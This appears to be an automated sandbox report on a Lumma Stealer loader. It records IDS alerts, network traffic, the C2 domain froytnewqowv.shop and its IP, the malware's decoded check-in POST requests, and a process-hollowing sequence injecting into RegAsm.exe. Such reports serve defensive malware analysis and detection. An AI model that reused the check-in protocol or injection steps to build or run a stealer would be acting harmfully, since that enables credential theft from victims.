2024-08-29T23:43:01.536679+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49705	443	192.168.2.5	188.114.97.3
2024-08-29T23:43:00.467801+0200	TCP	2049836	ET MALWARE Lumma Stealer Related Activity	1	49704	443	192.168.2.5	188.114.97.3
2024-08-29T23:43:00.467801+0200	TCP	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	49704	443	192.168.2.5	188.114.97.3
2024-08-29T23:42:59.777044+0200	UDP	2055478	ET MALWARE Lumma Stealer Domain in DNS Lookup (froytnewqowv .shop)	1	53799	53	192.168.2.5	1.1.1.1

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 23:42:59.800635099 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:42:59.800667048 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:42:59.800765038 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:42:59.802197933 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:42:59.802213907 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.286317110 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.286381960 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.290405035 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.290411949 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.290642023 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.332912922 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.344412088 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.344432116 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.344506979 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.467806101 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.467849970 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.467878103 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.467897892 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.467900991 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.467917919 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.467947006 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.468116999 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.468182087 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.469748974 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.469762087 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.469777107 CEST	49704	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.469780922 CEST	443	49704	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.585799932 CEST	49705	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.585833073 CEST	443	49705	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:00.585910082 CEST	49705	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.586230993 CEST	49705	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:00.586242914 CEST	443	49705	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:01.050184011 CEST	443	49705	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:01.050251007 CEST	49705	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:01.052676916 CEST	49705	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:01.052683115 CEST	443	49705	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:01.052942038 CEST	443	49705	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:01.054641962 CEST	49705	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:01.054658890 CEST	49705	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:01.054703951 CEST	443	49705	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:01.536679029 CEST	443	49705	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:01.536750078 CEST	443	49705	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:01.536885977 CEST	49705	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:01.568384886 CEST	49705	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:01.568407059 CEST	443	49705	188.114.97.3	192.168.2.5
Aug 29, 2024 23:43:01.568418026 CEST	49705	443	192.168.2.5	188.114.97.3
Aug 29, 2024 23:43:01.568423033 CEST	443	49705	188.114.97.3	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 23:42:59.777044058 CEST	53799	53	192.168.2.5	1.1.1.1
Aug 29, 2024 23:42:59.795326948 CEST	53	53799	1.1.1.1	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 29, 2024 23:42:59.777044058 CEST	192.168.2.5	1.1.1.1	0x78eb	Standard query (0)	froytnewqowv.shop	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 29, 2024 23:42:59.795326948 CEST	1.1.1.1	192.168.2.5	0x78eb	No error (0)	froytnewqowv.shop		188.114.97.3	A (IP address)	IN (0x0001)	false
Aug 29, 2024 23:42:59.795326948 CEST	1.1.1.1	192.168.2.5	0x78eb	No error (0)	froytnewqowv.shop		188.114.96.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

froytnewqowv.shop

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49704	188.114.97.3	443	4308	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 21:43:00 UTC	264	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: froytnewqowv.shop
2024-08-29 21:43:00 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2024-08-29 21:43:00 UTC	553	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 21:43:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close X-Frame-Options: SAMEORIGIN Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0NhGSvZgi3RMDTuQR6L0r6luxoipvvZqmdAtpyygrVuO5jevo60vk135JLluBSLin96cZHvG1byE6AaC%2BvNabv%2FDjOD%2FJEgv1Bdy0V5t7ws8CnBlDmkV3hVhXK34dWbWpOeEQA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bafb6d38bbb5e71-EWR
2024-08-29 21:43:00 UTC	816	IN	Data Raw: 31 31 32 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 Data Ascii: 112d<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
2024-08-29 21:43:00 UTC	1369	IN	Data Raw: 73 2f 63 66 2e 65 72 72 6f 72 73 2e 69 65 2e 63 73 73 22 20 2f 3e 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 3c 2f 73 74 79 6c 65 3e 0a 0a 0a 3c 21 2d 2d 5b 69 66 20 67 74 65 20 49 45 20 31 30 5d 3e 3c 21 2d 2d 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 69 66 20 28 21 6e 61 76 69 67 61 74 6f 72 2e 63 6f 6f 6b 69 65 45 6e 61 62 6c 65 64 29 20 7b 0a 20 20 20 20 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 44 4f 4d 43 6f 6e 74 65 6e 74 4c 6f 61 64 65 64 27 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0a 20 20 20 20 20 20 76 61 72 20 63 6f 6f 6b 69 65 45 6c 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 6f Data Ascii: s/cf.errors.ie.css" /><![endif]--><style>body{margin:0;padding:0}</style>...[if gte IE 10]>...><script> if (!navigator.cookieEnabled) { window.addEventListener('DOMContentLoaded', function () { var cookieEl = document.getElementById('co
2024-08-29 21:43:00 UTC	1369	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 61 74 6f 6b 22 20 76 61 6c 75 65 3d 22 57 50 73 57 4d 38 35 4b 75 6b 6d 6a 4d 55 73 72 65 34 6a 44 43 5f 76 6b 49 59 50 67 54 38 43 6b 46 57 64 63 55 47 68 38 69 70 6b 2d 31 37 32 34 39 36 37 37 38 30 2d 30 2e 30 2e 31 2e 31 2d 2f 61 70 69 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 6c 65 61 72 6e 69 6e 67 2f 61 63 63 65 73 73 2d 6d 61 6e 61 67 65 6d 65 6e 74 2f 70 68 69 73 68 69 6e 67 2d 61 74 74 61 63 6b 2f 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 22 20 Data Ascii: <input type="hidden" name="atok" value="WPsWM85KukmjMUsre4jDC_vkIYPgT8CkFWdcUGh8ipk-1724967780-0.0.1.1-/api"> <a href="https://www.cloudflare.com/learning/access-management/phishing-attack/" class="cf-btn"
2024-08-29 21:43:00 UTC	851	IN	Data Raw: 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 20 73 6d 3a 62 6c 6f 63 6b 20 73 6d 3a 6d 62 2d 31 22 3e 3c 73 70 61 6e 3e 50 65 72 66 6f 72 6d 61 6e 63 65 20 26 61 6d 70 3b 20 73 65 63 75 72 69 74 79 20 62 79 3c 2f 73 70 61 6e 3e 20 3c 61 20 72 65 6c 3d 22 6e 6f 6f 70 65 6e 65 72 20 6e 6f 72 65 66 65 72 72 65 72 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 35 78 78 2d 65 72 72 6f 72 2d 6c 61 6e 64 69 6e 67 22 20 69 64 3d 22 62 72 61 6e 64 5f 6c 69 6e 6b 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 3e 43 6c 6f 75 64 66 6c 61 72 65 3c Data Ascii: sm:hidden">•</span> </span> <span class="cf-footer-item sm:block sm:mb-1"><span>Performance & security by</span> <a rel="noopener noreferrer" href="https://www.cloudflare.com/5xx-error-landing" id="brand_link" target="_blank">Cloudflare<
2024-08-29 21:43:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49705	188.114.97.3	443	4308	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
2024-08-29 21:43:01 UTC	354	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Cookie: __cf_mw_byp=WPsWM85KukmjMUsre4jDC_vkIYPgT8CkFWdcUGh8ipk-1724967780-0.0.1.1-/api User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 51 Host: froytnewqowv.shop
2024-08-29 21:43:01 UTC	51	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 79 61 75 36 4e 61 2d 2d 35 30 33 33 32 32 39 30 35 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=yau6Na--503322905&j=
2024-08-29 21:43:01 UTC	806	IN	HTTP/1.1 200 OK Date: Thu, 29 Aug 2024 21:43:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=3f7imunjumcpcr6hudinoa52rc; expires=Mon, 23-Dec-2024 15:29:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1TrImBqBS5zXe4GejQ2GxLDXBT4ejxWRv%2FDLNe012p0vAf%2FZjGVqpWb4pR%2BUW6yNYLehNvwMy5CczcwFNuJJZyGmI8yqJy8QwkjRUOSpxRT4KWd04Kob%2BULM4s6WuySwRwfNvA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8bafb6d80fb4423d-EWR alt-svc: h3=":443"; ma=86400
2024-08-29 21:43:01 UTC	15	IN	Data Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a Data Ascii: aerror #D12
2024-08-29 21:43:01 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	17:42:59
Start date:	29/08/2024
Path:	C:\Users\user\Desktop\Loader.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Loader.exe"
Imagebase:	0xb20000
File size:	318'464 bytes
MD5 hash:	C7ACFF9E420DB036AB543E95341B8C8B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	17:42:59
Start date:	29/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	17:42:59
Start date:	29/08/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Imagebase:	0xb20000
File size:	65'440 bytes
MD5 hash:	0D5DF43AF2916F47D00C1573797C1A13
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	17:43:01
Start date:	29/08/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 1768
Imagebase:	0x250000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	27.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	52.4%
Total number of Nodes:	21
Total number of Limit Nodes:	0

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 02E2249D Relevance: 42.3, APIs: 10, Strings: 14, Instructions: 282
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,02E2240F,02E223FF), ref: 02E2260C
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 02E2261F
Wow64GetThreadContext.KERNEL32(000002E8,00000000), ref: 02E2263D
ReadProcessMemory.KERNELBASE(000002EC,?,02E22453,00000004,00000000), ref: 02E22661
VirtualAllocEx.KERNELBASE(000002EC,?,?,00003000,00000040), ref: 02E2268C
WriteProcessMemory.KERNELBASE(000002EC,00000000,?,?,00000000,?), ref: 02E226E4
WriteProcessMemory.KERNELBASE(000002EC,00400000,?,?,00000000,?,00000028), ref: 02E2272F
WriteProcessMemory.KERNELBASE(000002EC,-00000008,?,00000004,00000000), ref: 02E2276D
Wow64SetThreadContext.KERNEL32(000002E8,02E00000), ref: 02E227A9
ResumeThread.KERNELBASE(000002E8), ref: 02E227B8

Strings

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe, xrefs: 02E2260B
VirtualAllocEx, xrefs: 02E2259D
VirtualAlloc, xrefs: 02E22564
WriteProcessMemory, xrefs: 02E225B0
SetThreadContext, xrefs: 02E225C3
ReadProcessMemory, xrefs: 02E2258A
CreateProcessA, xrefs: 02E22551
Load, xrefs: 02E224DB
ResumeThread, xrefs: 02E225D9
GetThreadContext, xrefs: 02E22577
TerminateProcess, xrefs: 02E2269B
aryA, xrefs: 02E224E3
GetP, xrefs: 02E2251F
ress, xrefs: 02E22527

Memory Dump Source

Source File: 00000000.00000002.2034432874.0000000002E22000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E22000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2e22000_Loader.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResume
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe$CreateProcessA$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2687962208-1257834847
Opcode ID: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction ID: f8a1930da6dc2330fde8998e1744bf51e516bc17606577771202d6ecaf700d95
Opcode Fuzzy Hash: 5830fdbf51cd66032c811c655c8f92b1c7674356d546a8de58cf9f8e9e68e0da
Instruction Fuzzy Hash: 05B1E57664028AAFDB60CF68CC80BDA77A5FF88714F158524EA0CAB341D774FA51CB94

Function 01530B20 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 392
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03E23594,?,?,?), ref: 015310C1

Strings

&S!, xrefs: 01530BA8
#l>@, xrefs: 01530E4E

Memory Dump Source

Source File: 00000000.00000002.2034342615.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Loader.jbxd

Similarity

API ID: ProtectVirtual
String ID: #l>@$&S!
API String ID: 544645111-1705501573
Opcode ID: 9efbd8c32260de1e11e686d1fb280eaf4cba4c54eea6fe794c113c3d577c4706
Instruction ID: 4e46d3327c37d078f21f5ef3f9836a16005eeaeacc7ff5ffdf1418b1b7a72ea1
Opcode Fuzzy Hash: 9efbd8c32260de1e11e686d1fb280eaf4cba4c54eea6fe794c113c3d577c4706
Instruction Fuzzy Hash: 73F18FB0E016698FDB21CFA9C980B9DFBB2BF84310F148599E559AB342C734AD85CF54

Function 01530508 Relevance: 1.6, APIs: 1, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(03E23594,?,?,?), ref: 015310C1

Memory Dump Source

Source File: 00000000.00000002.2034342615.0000000001530000.00000040.00000800.00020000.00000000.sdmp, Offset: 01530000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1530000_Loader.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: dbff53e87c27c968e53628935ba0ff0e5a3ae50134a0f386d946f7f05260e294
Instruction ID: 4963618bc7c67ca6973be223d227be3edc70ff2a07a1ad6d0f6ffd7c0e364726
Opcode Fuzzy Hash: dbff53e87c27c968e53628935ba0ff0e5a3ae50134a0f386d946f7f05260e294
Instruction Fuzzy Hash: 5B21E0B5904659AFCB10DF9AD884ADEFBF4FB48310F10852AE918A7200C774A954CFE1

Analysis Process: RegAsm.exePID: 4308, Parent PID: 6772COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	24.4%
Total number of Nodes:	86
Total number of Limit Nodes:	17

Executed Functions

Function 0043681D Relevance: 19.7, APIs: 9, Strings: 2, Instructions: 405
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00436878
SysAllocString.OLEAUT32 ref: 0043692F
VariantInit.OLEAUT32(?), ref: 00436998
SysStringLen.OLEAUT32(00000000), ref: 00436A51

Strings

rnC, xrefs: 00436E61
YmC, xrefs: 00436E72

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: String$Alloc$InitVariant
String ID: YmC$rnC
API String ID: 3520221836-3969294163
Opcode ID: cc0782fa5bc4575f6715a7bde3449489c57378219f9bf7960f9699414c49ac44
Instruction ID: f7ea2be89283f713bd0516aaaec10ec30aeb0a5355e630bcd4f8e36aece2a8e2
Opcode Fuzzy Hash: cc0782fa5bc4575f6715a7bde3449489c57378219f9bf7960f9699414c49ac44
Instruction Fuzzy Hash: 85E17A75604B419FD328CF29C891B26B7F2FF49310F15892DD5968BBA1D739E442CB44

Function 0040B810 Relevance: 16.4, APIs: 3, Strings: 6, Instructions: 601
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(66FC64EC,00000000,00000800), ref: 0040B8BC

Strings

C6T&, xrefs: 0040BC4A
Z.^^, xrefs: 0040BC52
froytnewqowv.shop, xrefs: 0040BD3F, 0040BF96
0625911D5451AC863ECC1A31AADC7148, xrefs: 0040BD7A
QQ!., xrefs: 0040BC5A
\"Y , xrefs: 0040BC62

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: LibraryLoad
String ID: 0625911D5451AC863ECC1A31AADC7148$C6T&$QQ!.$Z.^^$\"Y $froytnewqowv.shop
API String ID: 1029625771-3471886239
Opcode ID: b8de83478b42807edfbfb77dcae6b9da56dc18adc1b9ec55f59c9e233b6e0b32
Instruction ID: 1f1654bdb7cbdd608bfaf90879f2b1bfbfdf568bc53ae3b2ddb7df9b58b85f24
Opcode Fuzzy Hash: b8de83478b42807edfbfb77dcae6b9da56dc18adc1b9ec55f59c9e233b6e0b32
Instruction Fuzzy Hash: 9912BFB45083409BD3109F15DC907AEBBE1EF96308F148A2EE8D56B392D7798905CF9E

Function 0040CC80 Relevance: 14.6, Strings: 11, Instructions: 842
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

p~, xrefs: 0040D200
5Q}S, xrefs: 0040CE35
Y1Y3, xrefs: 0040CDDD
+y-{, xrefs: 0040CEA3
froytnewqowv.shop, xrefs: 0040D811
[u#w, xrefs: 0040CE98
C-C/, xrefs: 0040CE2A
_=U?, xrefs: 0040CDFE
6abc, xrefs: 0040CEB9
;I+K, xrefs: 0040CE77
*M/O, xrefs: 0040CE82

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: *M/O$+y-{$5Q}S$6abc$;I+K$C-C/$Y1Y3$[u#w$_=U?$froytnewqowv.shop$p~
API String ID: 0-191147265
Opcode ID: 235eb8f41b427622067f72eeebc4fddb1cba5d8b5fe5d93c44688bf9b401b56a
Instruction ID: fc48a0543df603f45fec8ff12a8c085a20f594a9923345cd7e2eba27ad107f33
Opcode Fuzzy Hash: 235eb8f41b427622067f72eeebc4fddb1cba5d8b5fe5d93c44688bf9b401b56a
Instruction Fuzzy Hash: 406296B4508345DFD7249F54D890BAFBBB2FF86710F108A2DE5996B290CB349901CF5A

Function 0040C69D Relevance: 7.4, Strings: 5, Instructions: 1154COMMON

Download Yara Rule

Strings

p~, xrefs: 0040D200
sq, xrefs: 0040C824
froytnewqowv.shop, xrefs: 0040D811
:6, xrefs: 0040C73B
#:, xrefs: 0040C734

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: #:$:6$froytnewqowv.shop$p~$sq
API String ID: 0-2656505239
Opcode ID: b8d3c453bf9d974bcbdefaab6e3614b755ac33ba6e33800d31d81d4b13b8e1a0
Instruction ID: e326c0b78092f1179307cafdfc488eb50248af47790a0d19bcb8f83c70445e2f
Opcode Fuzzy Hash: b8d3c453bf9d974bcbdefaab6e3614b755ac33ba6e33800d31d81d4b13b8e1a0
Instruction Fuzzy Hash: FE92BAB4608701DFD714CF64D890B6EBBB1FF8A711F148A2CE5966B690CB34A811CF99

Function 0040C000 Relevance: 5.4, Strings: 4, Instructions: 422
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

WPsWM85KukmjMUsre4jDC_vkIYPgT8CkFWdcUGh8ipk-1724967780-0.0.1.1-/api, xrefs: 0040C507, 0040C524
(+, xrefs: 0040C1D7
~, xrefs: 0040C01E
A, xrefs: 0040C465

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID: (+$A$WPsWM85KukmjMUsre4jDC_vkIYPgT8CkFWdcUGh8ipk-1724967780-0.0.1.1-/api$~
API String ID: 0-987489533
Opcode ID: 7cb605134ac94ffdcf6288be40dd188c96069c587b8b6afe075ddef6a9cd403c
Instruction ID: 44a5d8f24ed4e4816ddfe326b5df41ea1088b2b54770a45eea7b330fb46f4ede
Opcode Fuzzy Hash: 7cb605134ac94ffdcf6288be40dd188c96069c587b8b6afe075ddef6a9cd403c
Instruction Fuzzy Hash: 28E1587410C380DBD315DF18C490A2FBBE1AF95758F188A6EE4D9AB391C339D846CB5A

Function 004365E0 Relevance: 1.6, APIs: 1, Instructions: 88
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(00441A50,00000000,00000001,00441A40,00000000), ref: 00436715

Memory Dump Source

Source File: 00000002.00000002.2208346617.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity
